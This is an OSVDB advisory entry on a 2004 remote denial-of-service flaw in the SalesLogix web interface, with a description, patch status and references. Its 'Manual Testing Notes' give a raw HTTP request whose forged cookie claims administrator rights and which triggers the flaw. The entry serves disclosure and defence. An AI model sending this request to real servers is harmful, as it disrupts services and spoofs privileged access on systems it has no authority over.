SalesLogix Invalid HTTP Request DoS

2004-10-18T09:05:30
ID OSVDB:10943
Type osvdb
Reporter Carl Livitt(carl@agenda-security.co.uk)
Modified 2004-10-18T09:05:30

Description

Vulnerability Description

SalesLogix contains a flaw that may allow a remote denial of service. The issue is triggered when an invalid HTTP request is issued, and will result in loss of availability for the service.

Solution Description

Currently, there are no known workarounds or upgrades to correct this issue. However, SalesLogix has released a patch to address this vulnerability.

Short Description

SalesLogix contains a flaw that may allow a remote denial of service. The issue is triggered when an invalid HTTP request is issued, and will result in loss of availability for the service.

Manual Testing Notes

GET /scripts/slxweb.dll/getfile HTTP/1.0 Host: [victim] Cookie: slxweb=user=Admin|teams=ADMIN!|usertype=Administrator|

References:

Vendor URL: http://www.saleslogix.com Vendor Specific Solution URL: http://support.saleslogix.com Security Tracker: 1011769 Secunia Advisory ID:12883 Related OSVDB ID: 10946 Related OSVDB ID: 10949 Related OSVDB ID: 10945 Related OSVDB ID: 10942 Related OSVDB ID: 10947 Related OSVDB ID: 10948 Related OSVDB ID: 10944 Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2004-10/0661.html Keyword: Agenda-Security-Saleslogix-1-2004 CVE-2004-1606